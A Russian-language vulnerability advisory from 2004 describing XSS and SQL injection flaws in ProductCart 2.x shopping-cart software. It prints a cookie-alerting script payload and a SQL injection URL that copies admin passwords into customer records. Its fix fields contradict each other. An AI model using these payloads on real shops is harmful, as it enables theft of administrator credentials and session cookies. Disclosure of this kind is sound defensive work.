Security Lab

Несколько уязвимостей в ProductCart

Дата публикации:19.02.2004
Всего просмотров:1809
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ProductCart 2.x
Уязвимые версии: ProductCart

Описание: Несколько уязвимостей обнаружено в ProductCart. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение.

1. XSS:

http://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.c ookie)</script><"
2. SQL инъекция:
http://www.shop.com/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&
priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastN
ame=(s--elect%20top%01%20adminpassword%20from%20admins
),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%2
0*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBr
and=0&resultCnt=200&Submit.x=33& 

URL производителя:http://www.earlyimpact.com/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: EarlyImpact ProductCart shopping cart software multiple security